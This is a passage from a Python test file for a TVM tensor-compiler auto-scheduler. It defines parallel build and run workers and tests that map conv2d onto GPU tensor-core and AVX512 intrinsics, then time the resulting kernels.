for a, b in zip(outputs_arrays_ref, outputs_arrays):
testing.assert_allclose(
a.asnumpy(), b.asnumpy(), atol=1e-3, rtol=1e-2)
# get performance
evaluator = func.time_evaluator(func.entry_name, ctx, number=10)
costs = evaluator(*inputs_arrays, *outputs_arrays)
print("Time cost: %f ms." % (costs.mean * 1e3))
gen.feedback(record, np.random.random())
print("Pass!\n")
GLOBAL_BUILD_INPUTS = None
GLOBAL_RUN_INPUTS = None
GLOBAL_RPC_RUN_INPUTS = None
MAX_FLOAT = 1e10 # We use 1e10 instead of sys.float_info.max for better readability in log
# this is similar to auto_scheduler
def native_loacl_build_worker(index):
"""
Build function of LocalBuilder to be ran in the Builder thread pool.
Parameters
----------
index : int
The MeasureInput index to be processed by the current Builder thread.
Returns
-------
res : BuildResult
The build result of this Builder thread.
"""
global GLOBAL_BUILD_INPUTS
# We use fork and a global variable to copy arguments between processes.
# This can avoid expensive serialization of TVM IR when using multiprocessing.Pool
if not GLOBAL_BUILD_INPUTS:
raise ValueError("GLOBAL_BUILD_INPUTS not found")
(
sch_app,
params_lst,
build_func,
target,
target_host,
timeout,
verbose
) = GLOBAL_BUILD_INPUTS
assert isinstance(build_func, str)
if build_func == "default":
build_func = tar.tar
elif build_func == "ndk":
build_func = ndk.create_shared
else:
raise ValueError("Invalid build_func" + build_func)
def timed_func():
tic = time.time()
params = params_lst[index]
target_dag = sch_app.target_dag
inputs = target_dag.get_inputs()
sch = tvm.te.create_schedule([x.op for x in target_dag.tensors])
error_no = auto_scheduler.measure.MeasureErrorNo.NO_ERROR
error_msg = None
args = inputs + list(target_dag.tensors)
try:
sch = sch_app.apply(sch, params)
# pylint: disable=broad-except
except Exception:
error_no = auto_scheduler.measure.MeasureErrorNo.INSTANTIATION_ERROR
error_msg = auto_scheduler.measure.make_error_msg()
if error_no == 0:
dirname = tempfile.mkdtemp()
filename = os.path.join(dirname, "tmp_func." + build_func.output_format)
try:
# TODO(merrymercy): Port the unroll pass.
with transform.PassContext():
func = build_module.build(
sch, args, target=target, target_host=target_host
)
func.export_library(filename, build_func)
# pylint: disable=broad-except
except Exception:
error_no = auto_scheduler.measure.MeasureErrorNo.COMPILE_HOST
error_msg = auto_scheduler.measure.make_error_msg()
else:
filename = ""
if verbose >= 1:
if error_no == auto_scheduler.measure.MeasureErrorNo.NO_ERROR:
print(".Y", end="", flush=True)
else:
print(".E", end="", flush=True) # Build error
return (filename, args, error_no, error_msg, time.time() - tic)
res = auto_scheduler.utils.call_func_with_timeout(timeout, timed_func)
if isinstance(res, TimeoutError):
if verbose >= 1:
print(".T", end="") # Build timeout
res = None, [], auto_scheduler.measure.MeasureErrorNo.BUILD_TIMEOUT, None, timeout
return res
def native_local_builder_build(sch_app, params_lst, target, target_host, timeout, n_parallel, build_func="default", verbose=1):
"""
Build function of LocalBuilder to build the MeasureInputs to runnable modules.
Parameters
----------
inputs : List[MeasureInput]
The MeasureInputs to be built.
timeout : int
The timeout limit (in second) for each build thread.
This is used in a wrapper of the multiprocessing.Process.join().
n_parallel : int
Number of threads used to build in parallel.
build_func : str = 'default'
The name of build function to process the built module.
verbose: int = 1
Verbosity level. 0 for silent, 1 to output information during program building.
Returns
-------
res : List[BuildResult]
The build results of these MeasureInputs.
"""
# We use fork and a global variable to copy arguments between processes.
# This can avoid expensive serialization of TVM IR when using multiprocessing.Pool
global GLOBAL_BUILD_INPUTS
GLOBAL_BUILD_INPUTS = (sch_app, params_lst, build_func, target, target_host, timeout, verbose)
pool = auto_scheduler.measure.NoDaemonPool(n_parallel)
tuple_res = pool.map(native_loacl_build_worker, range(len(params_lst)))
pool.terminate()
pool.join()
del pool
results = []
for res in tuple_res:
results.append(auto_scheduler.measure.BuildResult(*res))
if verbose >= 1:
print("", flush=True)
return results
# this is similar to auto_scheduler
def native_local_run_worker():
global GLOBAL_RUN_INPUTS
(
target,
dev_id,
build_results,
timeout,
number,
repeat,
min_repeat_ms,
cooldown_interval,
enable_cpu_cache_flush,
verbose,
) = GLOBAL_RUN_INPUTS
def timed_func(build_res):
tic = time.time()
error_no = 0
error_msg = None
if build_res.error_no != auto_scheduler.measure.MeasureErrorNo.NO_ERROR:
return (
(MAX_FLOAT,),
build_res.error_no,
build_res.error_msg,
build_res.time_cost,
time.time(),
)
try:
func = module.load_module(build_res.filename)
ctx = ndarray.context(str(target), dev_id)
# Limitation:
# We can not get PackFunction directly in the remote mode as it is wrapped
# under the std::function. We could lift the restriction later once we fold
# the PackedFunc as an object. Currently, we pass function name to work
# around it.
f_prepare = "cache_flush_cpu_non_first_arg" if enable_cpu_cache_flush else ""
time_f = func.time_evaluator(
func.entry_name,
ctx,
number=number,
repeat=repeat,
min_repeat_ms=min_repeat_ms,
# f_preproc=f_prepare,
)
# pylint: disable=broad-except
except Exception:
costs = (MAX_FLOAT,)
error_no = auto_scheduler.measure.MeasureErrorNo.COMPILE_DEVICE
error_msg = auto_scheduler.measure.make_error_msg()
if error_no == 0:
try:
args = [
ndarray.empty(auto_scheduler.utils.get_const_tuple(x.shape), x.dtype, ctx) for x in build_res.args
]
random_fill = tvm.get_global_func("tvm.contrib.random.random_fill", True)
assert random_fill, "Please make sure USE_RANDOM is ON in the config.cmake"
for arg in args:
random_fill(arg)
ctx.sync()
costs = time_f(*args).results
# pylint: disable=broad-except
except Exception:
costs = (MAX_FLOAT,)
error_no = auto_scheduler.measure.MeasureErrorNo.RUNTIME_DEVICE
error_msg = auto_scheduler.measure.make_error_msg()
shutil.rmtree(os.path.dirname(build_res.filename))
toc = time.time()
time.sleep(cooldown_interval)
if verbose >= 1:
if error_no == auto_scheduler.measure.MeasureErrorNo.NO_ERROR:
print("*Y", end="", flush=True)
else:
print("*E", end="", flush=True) # Run error
return (costs, error_no, error_msg, toc - tic + build_res.time_cost, toc)
measure_results = []
for build_res in build_results:
if build_res.error_no != 0:
res = (
(MAX_FLOAT,),
build_res.error_no,
build_res.error_msg,
build_res.time_cost,
time.time(),
)
else:
res = auto_scheduler.utils.call_func_with_timeout(timeout, timed_func, args=(build_res,))
if isinstance(res, TimeoutError):
if verbose >= 1:
print("*T", end="") # Run timeout
res = (
(MAX_FLOAT,),
auto_scheduler.measure.MeasureErrorNo.RUN_TIMEOUT,
None,
build_res.time_cost + timeout,
time.time(),
)
measure_results.append(auto_scheduler.measure.MeasureResult(*res))
if verbose >= 1:
print("", flush=True)
return measure_results
@register_test
def test2():
print("##########################")
print("Test 2")
hw_abs_dag = at.WMMAFp16Fp32()
compute_key = "nnn"
shape_key = "8x32x16"
intrin_dag, _ = hw_abs_dag.get_effective_compute_dag(compute_key, shape_key)
A, B, bias, E = conv2d(1, 128, 14, 14, 64, 3, 3, 1, 1)
target_dag = at.compute_dag_from_tensors([E])
inputs_ref = target_dag.get_inputs()
sch_ref = tvm.te.create_schedule([x.op for x in target_dag.tensors])
func_ref = tvm.build(sch_ref, inputs_ref +
list(target_dag.tensors), "llvm")
ctx = tvm.cpu()
inputs_np_arrays = get_np_arrays(inputs_ref)
inputs_arrays = get_tvm_arrays_from_np_arrays(inputs_np_arrays, ctx)
outputs_arrays_ref = get_tvm_arrays(list(target_dag.tensors), ctx)
func_ref(*inputs_arrays, *outputs_arrays_ref)
main_op_map = {
intrin_dag.op_lst[0]: target_dag.op_lst[0]
}
elem_op_map = {
}
ii, jj = intrin_dag.op_lst[0].axis
kk, = intrin_dag.op_lst[0].reduce_axis
n, k, p, q = target_dag.op_lst[0].axis
rc, rr, rs = target_dag.op_lst[0].reduce_axis
axis_map = {
ii: [n, n, n, p, p, q, q],
jj: [k, k, k, k, k, k, k],
kk: [rc, rr, rs, rc, rs, rc, rr]
}
match_result = at.IntrinMatchResult(
hw_abs_dag, compute_key, shape_key,
main_op_map, elem_op_map,
axis_map, target_dag, intrin_dag
)
gen = at.MappingGenerator(match_result)
beg = time.time()
for i in range(1):
record = gen.get(policy="random")
record.vmap_choice = ([1, 0, 0, 0, 0, 0, 1], record.vmap_choice[1])
print("transform decision:")
for k, v in record.to_json().items():
print(k, "=", v)
app = at.MappingApplier(match_result)
new_state = app.apply(record)
schedule_gen = at.CUDAScheduleGenerator(match_result, new_state)
sc_info = schedule_gen.get_schedule_compute_info()
schedule_app = at.CUDAScheduleApplier(match_result, sc_info)
params_lst = []
trials = 10
print("trials=", trials)
for j in range(trials):
params = schedule_gen.get(policy="random")
my_params = {
'vectorize': (1, 1),
'spatial_factors': [([1, 1, 1], (0, 0)), ([4, 1, 1], (-1, 1)), ([14, 1, 1], (-1, -1))],
'reduce_factors': [([3, 3, 4], (1, 1)), ([1, 1, 3], (0, -1))],
'last_factors': [([-1, 32], (-1,))],
'output_unroll_step': (64, -1),
'last_unroll_step': (512, 1)}
params.from_json(my_params)
params_lst.append(params)
global GLOBAL_BUILD_INPUTS
global GLOBAL_RUN_INPUTS
build_func = "default"
target_host = "llvm"
timeout = 15
verbose = 1
GLOBAL_BUILD_INPUTS = (
schedule_app,
params_lst,
build_func,
hw_abs_dag.target,
target_host,
verbose
)
build_results = native_local_builder_build(
schedule_app,
params_lst,
hw_abs_dag.target,
target_host,
timeout,
1,
build_func=build_func,
verbose=verbose)
for r in build_results:
print(r)
number = 1
repeat = 1
min_repeat_ms = 150
cooldown_interval = 1
enable_cpu_cache_flush = 1
GLOBAL_RUN_INPUTS = (
hw_abs_dag.target,
0,
build_results,
timeout,
number,
repeat,
min_repeat_ms,
cooldown_interval,
enable_cpu_cache_flush,
verbose
)
run_results = native_local_run_worker()
for r in run_results:
print(r)
gen.feedback(record, np.random.random())
end = time.time()
print("Pass %f seconds." % (end - beg))
print("Pass!\n")
def pebble_local_build_worker(index):
"""
Build function of LocalBuilder to be ran in the Builder thread pool.
Parameters
----------
index : int
The MeasureInput index to be processed by the current Builder thread.
Returns
-------
res : BuildResult
The build result of this Builder thread.
"""
global GLOBAL_BUILD_INPUTS
# We use fork and a global variable to copy arguments between processes.
# This can avoid expensive serialization of TVM IR when using multiprocessing.Pool
if not GLOBAL_BUILD_INPUTS:
raise ValueError("GLOBAL_BUILD_INPUTS not found")
(
sch_app,
params_lst,
build_func,
name,
target,
target_host,
timeout,
verbose
) = GLOBAL_BUILD_INPUTS
assert isinstance(build_func, str)
if build_func == "default":
build_func = tar.tar
elif build_func == "ndk":
build_func = ndk.create_shared
else:
raise ValueError("Invalid build_func" + build_func)
def timed_func():
tic = time.time()
params = params_lst[index]
target_dag = sch_app.target_dag
inputs = target_dag.get_inputs()
sch = tvm.te.create_schedule([x.op for x in target_dag.tensors])
error_no = auto_scheduler.measure.MeasureErrorNo.NO_ERROR
error_msg = None
args = inputs + list(target_dag.tensors)
try:
sch = sch_app.apply(sch, params)
print(tvm.lower(sch, args, simple_mode=True))
# pylint: disable=broad-except
except Exception:
error_no = auto_scheduler.measure.MeasureErrorNo.INSTANTIATION_ERROR
error_msg = auto_scheduler.measure.make_error_msg()
print(error_msg)
if error_no == 0:
dirname = tempfile.mkdtemp()
filename = os.path.join(dirname, "tmp_func." + build_func.output_format)
try:
# TODO(merrymercy): Port the unroll pass.
with transform.PassContext():
func = build_module.build(
sch, args, target=target, target_host=target_host,
name=name
)
func.export_library(filename, build_func)
# pylint: disable=broad-except
except Exception:
error_no = auto_scheduler.measure.MeasureErrorNo.COMPILE_HOST
error_msg = auto_scheduler.measure.make_error_msg()
else:
filename = ""
if verbose >= 1:
if error_no == auto_scheduler.measure.MeasureErrorNo.NO_ERROR:
print(".Y", end="", flush=True)
else:
print(".E", end="", flush=True) # Build error
return (filename, args, error_no, error_msg, time.time() - tic)
return timed_func()
def pebble_local_builder_build(
sch_app, params_lst, target, target_host, timeout, n_parallel,
build_func="default", verbose=1, name="main"):
"""
Build function of LocalBuilder to build the MeasureInputs to runnable modules.
Parameters
----------
inputs : List[MeasureInput]
The MeasureInputs to be built.
timeout : int
The timeout limit (in second) for each build thread.
This is used in a wrapper of the multiprocessing.Process.join().
n_parallel : int
Number of threads used to build in parallel.
build_func : str = 'default'
The name of build function to process the built module.
verbose: int = 1
Verbosity level. 0 for silent, 1 to output information during program building.
Returns
-------
res : List[BuildResult]
The build results of these MeasureInputs.
"""
# We use fork and a global variable to copy arguments between processes.
# This can avoid expensive serialization of TVM IR when using multiprocessing.Pool
global GLOBAL_BUILD_INPUTS
GLOBAL_BUILD_INPUTS = (
sch_app, params_lst, build_func, name,
target, target_host, timeout, verbose)
with ProcessPool(n_parallel) as pool:
future = pool.map(pebble_local_build_worker, range(len(params_lst)), timeout=timeout)
iterator = future.result()
results = []
while True:
try:
result = next(iterator)
except StopIteration:
break
except TimeoutError as error:
if verbose >= 1:
print(".T", end="", flush=True)
result = None, [], auto_scheduler.measure.MeasureErrorNo.BUILD_TIMEOUT, None, timeout
except Exception as error:
if verbose >= 1:
print(".F", end="", flush=True)
result = None, [], auto_scheduler.measure.MeasureErrorNo.COMPILE_HOST, None, timeout
results.append(auto_scheduler.measure.BuildResult(*result))
if verbose >= 1:
print("", flush=True)
return results
# this is similar to auto_scheduler
def pebble_local_run_worker(index):
global GLOBAL_RUN_INPUTS
(
target,
dev_id,
build_results,
name,
timeout,
number,
repeat,
min_repeat_ms,
cooldown_interval,
enable_cpu_cache_flush,
verbose,
) = GLOBAL_RUN_INPUTS
def timed_func(build_res):
if build_res.error_no != 0:
res = (
(MAX_FLOAT,),
build_res.error_no,
build_res.error_msg,
build_res.time_cost,
time.time(),
)
return res
tic = time.time()
error_no = 0
error_msg = None
if build_res.error_no != auto_scheduler.measure.MeasureErrorNo.NO_ERROR:
return (
(MAX_FLOAT,),
build_res.error_no,
build_res.error_msg,
build_res.time_cost,
time.time(),
)
try:
func = module.load_module(build_res.filename)
ctx = ndarray.context(str(target), dev_id)
# Limitation:
# We can not get PackFunction directly in the remote mode as it is wrapped
# under the std::function. We could lift the restriction later once we fold
# the PackedFunc as an object. Currently, we pass function name to work
# around it.
f_prepare = "cache_flush_cpu_non_first_arg" if enable_cpu_cache_flush else ""
time_f = func.time_evaluator(
func.entry_name if name is None else name,
ctx,
number=number,
repeat=repeat,
min_repeat_ms=min_repeat_ms,
# f_preproc=f_prepare,
)
# pylint: disable=broad-except
except Exception:
costs = (MAX_FLOAT,)
error_no = auto_scheduler.measure.MeasureErrorNo.COMPILE_DEVICE
error_msg = auto_scheduler.measure.make_error_msg()
if error_no == 0:
try:
args = [
ndarray.empty(auto_scheduler.utils.get_const_tuple(x.shape), x.dtype, ctx) for x in build_res.args
]
random_fill = tvm.get_global_func("tvm.contrib.random.random_fill", True)
assert random_fill, "Please make sure USE_RANDOM is ON in the config.cmake"
for arg in args:
random_fill(arg)
ctx.sync()
costs = time_f(*args).results
# pylint: disable=broad-except
except Exception:
costs = (MAX_FLOAT,)
error_no = auto_scheduler.measure.MeasureErrorNo.RUNTIME_DEVICE
error_msg = auto_scheduler.measure.make_error_msg()
shutil.rmtree(os.path.dirname(build_res.filename))
toc = time.time()
time.sleep(cooldown_interval)
if verbose >= 1:
if error_no == auto_scheduler.measure.MeasureErrorNo.NO_ERROR:
print("*Y", end="", flush=True)
else:
print("*E", end="", flush=True) # Run error
return (costs, error_no, error_msg, toc - tic + build_res.time_cost, toc)
return timed_func(build_results[index])
def pebble_local_runner_run(
target,
dev_id,
build_results,
timeout,
number,
repeat,
min_repeat_ms,
cooldown_interval,
enable_cpu_cache_flush,
verbose=1,
name="main"):
global GLOBAL_RUN_INPUTS
GLOBAL_RUN_INPUTS = (
target,
dev_id,
build_results,
name,
timeout,
number,
repeat,
min_repeat_ms,
cooldown_interval,
enable_cpu_cache_flush,
verbose
)
measure_results = []
with ProcessPool(1) as pool:
future = pool.map(pebble_local_run_worker, range(len(build_results)), timeout=timeout)
iterator = future.result()
while True:
try:
result = next(iterator)
except StopIteration:
break
except TimeoutError:
if verbose >= 1:
print("*T", end="", flush=True) # Run timeout
result = (
(MAX_FLOAT,),
auto_scheduler.measure.MeasureErrorNo.RUN_TIMEOUT,
None,
timeout + timeout,
time.time(),
)
except Exception as error:
if verbose >= 1:
print("*F", end="", flush=True) # Run fatal error
result = (
(MAX_FLOAT,),
auto_scheduler.measure.MeasureErrorNo.RUNTIME_DEVICE,
None,
timeout + timeout,
time.time(),
)
measure_results.append(
auto_scheduler.measure.MeasureResult(*result))
if verbose >= 1:
print("", flush=True)
return measure_results
@register_test
def test3():
print("##########################")
print("Test 3")
hw_abs_dag = at.WMMAFp16Fp32()
compute_key = "nnn"
shape_key = "8x32x16"
intrin_dag, _ = hw_abs_dag.get_effective_compute_dag(compute_key, shape_key)
A, B, bias, E = conv2d(1, 128, 14, 14, 64, 3, 3, 1, 1)
target_dag = at.compute_dag_from_tensors([E])
inputs_ref = target_dag.get_inputs()
sch_ref = tvm.te.create_schedule([x.op for x in target_dag.tensors])
func_ref = tvm.build(sch_ref, inputs_ref +
list(target_dag.tensors), "llvm")
ctx = tvm.cpu()
inputs_np_arrays = get_np_arrays(inputs_ref)
inputs_arrays = get_tvm_arrays_from_np_arrays(inputs_np_arrays, ctx)
outputs_arrays_ref = get_tvm_arrays(list(target_dag.tensors), ctx)
func_ref(*inputs_arrays, *outputs_arrays_ref)
main_op_map = {
intrin_dag.op_lst[0]: target_dag.op_lst[0]
}
elem_op_map = {
}
ii, jj = intrin_dag.op_lst[0].axis
kk, = intrin_dag.op_lst[0].reduce_axis
n, k, p, q = target_dag.op_lst[0].axis
rc, rr, rs = target_dag.op_lst[0].reduce_axis
axis_map = {
ii: [n, n, n, p, p, q, q],
jj: [k, k, k, k, k, k, k],
kk: [rc, rr, rs, rc, rs, rc, rr]
}
match_result = at.IntrinMatchResult(
hw_abs_dag, compute_key, shape_key,
main_op_map, elem_op_map,
axis_map, target_dag, intrin_dag
)
gen = at.MappingGenerator(match_result)
beg = time.time()
for i in range(1):
record = gen.get(policy="random")
record.vmap_choice = ([1, 1, 1, 1, 1, 1, 1], record.vmap_choice[1])
print("transform decision:")
for k, v in record.to_json().items():
print(k, "=", v)
app = at.MappingApplier(match_result)
new_state = app.apply(record)
schedule_gen = at.CUDAScheduleGenerator(match_result, new_state)
sc_info = schedule_gen.get_schedule_compute_info()
schedule_app = at.CUDAScheduleApplier(match_result, sc_info)
params_lst = []
trials = 32
print("trials=", trials)
for j in range(trials):
params = schedule_gen.get(policy="random")
# my_params = {
# 'vectorize': (1, 1),
# 'spatial_factors': [([1, 1, 1], (0, 0)), ([4, 1, 1], (-1, 1)), ([14, 1, 1], (-1, -1))],
# 'reduce_factors': [([3, 3, 4], (1, 1)), ([1, 1, 3], (0, -1))],
# 'last_factors': [([-1, 32], (-1,))],
# 'output_unroll_step': (64, -1),
# 'last_unroll_step': (512, 1)}
# params.from_json(my_params)
params_lst.append(params)
build_func = "default"
target_host = "llvm"
timeout = 15
verbose = 1
build_results = pebble_local_builder_build(
schedule_app,
params_lst,
hw_abs_dag.target,
target_host,
timeout,
1,
build_func=build_func,
verbose=verbose)
for r in build_results:
print(r)
number = 1
repeat = 1
min_repeat_ms = 150
cooldown_interval = 1
enable_cpu_cache_flush = 1
run_results = pebble_local_runner_run(
hw_abs_dag.target,
0,
build_results,
timeout,
number,
repeat,
min_repeat_ms,
cooldown_interval,
enable_cpu_cache_flush,
verbose
)
for r in run_results:
print(r)
gen.feedback(record, np.random.random())
end = time.time()
print("Pass %f seconds." % (end - beg))
print("Pass!\n")
def tg_parallel_build_worker(name):
global GLOBAL_BUILD_INPUTS
# We use fork and a global variable to copy arguments between processes.
# This can avoid expensive serialization of TVM IR when using multiprocessing.Pool
if not GLOBAL_BUILD_INPUTS:
raise ValueError("GLOBAL_BUILD_INPUTS not found")
(
sch_app,
params_lst,
build_func,
target,
target_host,
verbose
) = GLOBAL_BUILD_INPUTS
assert isinstance(build_func, str)
if build_func == "default":
build_func = tar.tar
elif build_func == "ndk":
build_func = ndk.create_shared
else:
raise ValueError("Invalid build_func" + build_func)
target_dag = sch_app.target_dag
inputs = target_dag.get_inputs()
args = inputs + list(target_dag.tensors)
schs = []
err_nos = []
err_msgs = []
filenames = []
rets = []
tic = time.time()
for i, params in enumerate(params_lst):
sch = tvm.te.create_schedule([x.op for x in target_dag.tensors])
try:
sch = sch_app.apply(sch, params)
schs.append(sch)
err_nos.append(auto_scheduler.measure.MeasureErrorNo.NO_ERROR)
err_msgs.append(None)
except Exception:
err_nos.append(auto_scheduler.measure.MeasureErrorNo.INSTANTIATION_ERROR)
err_msgs.append(auto_scheduler.measure.make_error_msg())
filenames.append("")
if schs:
mod_err_nos = []
mod_err_msgs = []
mods = tg.parallel_build(
schs, args, target=target, target_host=target_host, name=name)
p_mod = 0
for i, err in enumerate(err_nos):
if err == auto_scheduler.measure.MeasureErrorNo.NO_ERROR:
mod = mods[p_mod]
p_mod += 1
if mod is None:
if verbose >= 1:
print(".E", end="", flush=True)
mod_err_nos.append(
auto_scheduler.measure.MeasureErrorNo.COMPILE_HOST
)
mod_err_msgs.append(
"Build error in tg.parallel_build"
)
else:
if verbose >= 1:
print(".Y", end="", flush=True)
mod_err_nos.append(err)
mod_err_msgs.append(err_msgs[i])
dirname = tempfile.mkdtemp()
filename = os.path.join(
dirname, "tmp_func." + build_func.output_format)
filenames[i] = filename
mod.export_library(filename, build_func)
else:
if verbose >= 1:
print(".I", end="", flush=True)
mod_err_nos.append(err)
mod_err_msgs.append(err_msgs[i])
err_nos = mod_err_nos
err_msgs = mod_err_msgs
toc = time.time()
for no, msg, filename in zip(err_nos, err_msgs, filenames):
rets.append(
(
filename, args, no, msg, toc - tic
)
)
if verbose >= 1:
print("", flush=True)
return rets
def tg_parallel_builder_build(
sch_app, params_lst, target, target_host,
build_func="default", timeout=150, verbose=1, name="main"):
global GLOBAL_BUILD_INPUTS
GLOBAL_BUILD_INPUTS = (
sch_app,
params_lst,
build_func,
target,
target_host,
verbose
)
with ProcessPool(1) as pool:
future = pool.map(tg_parallel_build_worker, [name], timeout=timeout)
iterator = future.result()
while True:
try:
results = next(iterator)
except StopIteration:
break
except TimeoutError as error:
if verbose >= 1:
print("Build Timeout.", flush=True)
results = [
(None, [],
auto_scheduler.measure.MeasureErrorNo.BUILD_TIMEOUT,
None, timeout) for i in range(len(params_lst))]
except Exception as error:
if verbose >= 1:
print("Build Fatal Error\n",
auto_scheduler.measure.make_error_msg(), flush=True)
results = [
(None, [],
auto_scheduler.measure.MeasureErrorNo.COMPILE_HOST,
None, timeout) for i in range(len(params_lst))]
results = [auto_scheduler.measure.BuildResult(*x) for x in results]
return results
@register_test
def test4():
print("##########################")
print("Test 4")
hw_abs_dag = at.WMMAFp16Fp32()
compute_key = "nnn"
shape_key = "8x32x16"
intrin_dag, _ = hw_abs_dag.get_effective_compute_dag(compute_key, shape_key)
A, B, bias, E = conv2d(1, 128, 14, 14, 64, 3, 3, 1, 1)
target_dag = at.compute_dag_from_tensors([E])
inputs_ref = target_dag.get_inputs()
sch_ref = tvm.te.create_schedule([x.op for x in target_dag.tensors])
func_ref = tvm.build(sch_ref, inputs_ref +
list(target_dag.tensors), "llvm")
ctx = tvm.cpu()
inputs_np_arrays = get_np_arrays(inputs_ref)
inputs_arrays = get_tvm_arrays_from_np_arrays(inputs_np_arrays, ctx)
outputs_arrays_ref = get_tvm_arrays(list(target_dag.tensors), ctx)
func_ref(*inputs_arrays, *outputs_arrays_ref)
main_op_map = {
intrin_dag.op_lst[0]: target_dag.op_lst[0]
}
elem_op_map = {
}
ii, jj = intrin_dag.op_lst[0].axis
kk, = intrin_dag.op_lst[0].reduce_axis
n, k, p, q = target_dag.op_lst[0].axis
rc, rr, rs = target_dag.op_lst[0].reduce_axis
axis_map = {
ii: [n, n, n, p, p, q, q],
jj: [k, k, k, k, k, k, k],
kk: [rc, rr, rs, rc, rs, rc, rr]
}
match_result = at.IntrinMatchResult(
hw_abs_dag, compute_key, shape_key,
main_op_map, elem_op_map,
axis_map, target_dag, intrin_dag
)
gen = at.MappingGenerator(match_result)
beg = time.time()
for i in range(1):
record = gen.get(policy="random")
record.vmap_choice = ([1, 1, 1, 1, 1, 1, 1], record.vmap_choice[1])
print("transform decision:")
for k, v in record.to_json().items():
print(k, "=", v)
app = at.MappingApplier(match_result)
new_state = app.apply(record)
schedule_gen = at.CUDAScheduleGenerator(match_result, new_state)
sc_info = schedule_gen.get_schedule_compute_info()
schedule_app = at.CUDAScheduleApplier(match_result, sc_info)
params_lst = []
trials = 32
print("trials=", trials)
for j in range(trials):
params = schedule_gen.get(policy="random")
# my_params = {
# 'vectorize': (1, 1),
# 'spatial_factors': [([1, 1, 1], (0, 0)), ([4, 1, 1], (-1, 1)), ([14, 1, 1], (-1, -1))],
# 'reduce_factors': [([3, 3, 4], (1, 1)), ([1, 1, 3], (0, -1))],
# 'last_factors': [([-1, 32], (-1,))],
# 'output_unroll_step': (64, -1),
# 'last_unroll_step': (512, 1)}
# params.from_json(my_params)
params_lst.append(params)
build_func = "default"
target_host = "llvm"
timeout = 150
verbose = 1
build_results = tg_parallel_builder_build(
schedule_app,
params_lst,
hw_abs_dag.target,
target_host,
timeout=timeout,
build_func=build_func,
verbose=verbose)
for r in build_results:
print(r)
number = 1
repeat = 1
min_repeat_ms = 150
cooldown_interval = 1
enable_cpu_cache_flush = 1
run_results = pebble_local_runner_run(
hw_abs_dag.target,
0,
build_results,
timeout,
number,
repeat,
min_repeat_ms,
cooldown_interval,
enable_cpu_cache_flush,
verbose
)
for r in run_results:
print(r)
gen.feedback(record, np.random.random())
end = time.time()
print("Pass %f seconds." % (end - beg))
print("Pass!\n")
@register_test
def test5():
print("##########################")
print("Test 5")
hw_abs_dag = at.WMMAFp16Fp32()
compute_key = "nnn"
shape_key = "16x16x16"
intrin_dag, _ = hw_abs_dag.get_effective_compute_dag(compute_key, shape_key)
A, B, E = conv2d(1, 128, 14, 14, 64, 3, 3, 1, 1, with_bias=False)
target_dag = at.compute_dag_from_tensors([E])
# inputs_ref = target_dag.get_inputs()
sch_ref = tvm.te.create_schedule([x.op for x in target_dag.tensors])
print(tvm.lower(sch_ref, [A, B, E], simple_mode=True))
# func_ref = tvm.build(sch_ref, inputs_ref +
# list(target_dag.tensors), "llvm")
# ctx = tvm.cpu()
# inputs_np_arrays = get_np_arrays(inputs_ref)
# inputs_arrays = get_tvm_arrays_from_np_arrays(inputs_np_arrays, ctx)
# outputs_arrays_ref = get_tvm_arrays(list(target_dag.tensors), ctx)
# func_ref(*inputs_arrays, *outputs_arrays_ref)
main_op_map = {
intrin_dag.op_lst[0]: target_dag.op_lst[0]
}
elem_op_map = {
}
ii, jj = intrin_dag.op_lst[0].axis
kk, = intrin_dag.op_lst[0].reduce_axis
n, k, p, q = target_dag.op_lst[0].axis
rc, rr, rs = target_dag.op_lst[0].reduce_axis
axis_map = {
ii: [n, n, n, p, p, q, q],
jj: [k, k, k, k, k, k, k],
kk: [rc, rr, rs, rc, rs, rc, rr]
}
match_result = at.IntrinMatchResult(
hw_abs_dag, compute_key, shape_key,
main_op_map, elem_op_map,
axis_map, target_dag, intrin_dag
)
gen = at.MappingGenerator(match_result)
beg = time.time()
for i in range(1):
record = gen.get(policy="random")
record.vmap_choice = ([1, 1, 1, 1, 1, 1, 1], record.vmap_choice[1])
print("transform decision:")
for k, v in record.to_json().items():
print(k, "=", v)
app = at.MappingApplier(match_result)
new_state = app.apply(record)
schedule_gen = at.CUDAScheduleGeneratorSplitK(match_result, new_state)
sc_info = schedule_gen.get_schedule_compute_info()
schedule_app = at.CUDAScheduleApplierSplitK(match_result, sc_info)
params_lst = []
trials = 1
print("trials=", trials)
for j in range(trials):
params = schedule_gen.get(policy="random")
my_params = {
'split_K': (4, 0),
'inline': (0, 1),
'vectorize': (1, 1),
'spatial_factors': [([2, 1, 1, 2], (0, 0)), ([4, 1, 1, 2], (-1, 1)), ([14, 1, 1, 1], (-1, -1))],
'reduce_factors': [([3, 2, 2], (1, 1)), ([1, 1, 3], (0, -1))],
'last_factors': [([-1, 32], (-1,))],
'output_unroll_step': (64, -1),
'last_unroll_step': (512, 1)}
params.from_json(my_params)
params_lst.append(params)
build_func = "default"
target_host = "llvm"
timeout = 150
verbose = 1
# build_results = tg_parallel_builder_build(
# schedule_app,
# params_lst,
# hw_abs_dag.target,
# target_host,
# timeout=timeout,
# build_func=build_func,
# verbose=verbose)
build_results = pebble_local_builder_build(
schedule_app,
params_lst,
hw_abs_dag.target,
target_host,
timeout,
1,
build_func=build_func)
for r in build_results:
print(r)
number = 1
repeat = 1
min_repeat_ms = 150
cooldown_interval = 1
enable_cpu_cache_flush = 1
run_results = pebble_local_runner_run(
hw_abs_dag.target,
0,
build_results,
timeout,
number,
repeat,
min_repeat_ms,
cooldown_interval,
enable_cpu_cache_flush,
verbose
)
for r in run_results:
print(r)
gen.feedback(record, np.random.random())
end = time.time()
print("Pass %f seconds." % (end - beg))
print("Pass!\n")
@register_test
def test6():
print("##########################")
print("Test 6")
hw_abs_dag = at.AVX512SkylakeGemvhw_abs_dag()
compute_key = "dummy"
shape_key = "16x4"
intrin_dag, _ = hw_abs_dag.get_effective_compute_dag(compute_key, shape_key)
A, B, E = conv2d(1, 128, 14, 14, 64, 3, 3, 1, 1, with_bias=False, in_dtype=["uint8", "int8"], out_dtype="int32")
target_dag = at.compute_dag_from_tensors([E])
# inputs_ref = target_dag.get_inputs()
sch_ref = tvm.te.create_schedule([x.op for x in target_dag.tensors])
print(tvm.lower(sch_ref, [A, B, E], simple_mode=True))
# func_ref = tvm.build(sch_ref, inputs_ref +
# list(target_dag.tensors), "llvm")
# ctx = tvm.cpu()
# inputs_np_arrays = get_np_arrays(inputs_ref)
# inputs_arrays = get_tvm_arrays_from_np_arrays(inputs_np_arrays, ctx)
# outputs_arrays_ref = get_tvm_arrays(list(target_dag.tensors), ctx)
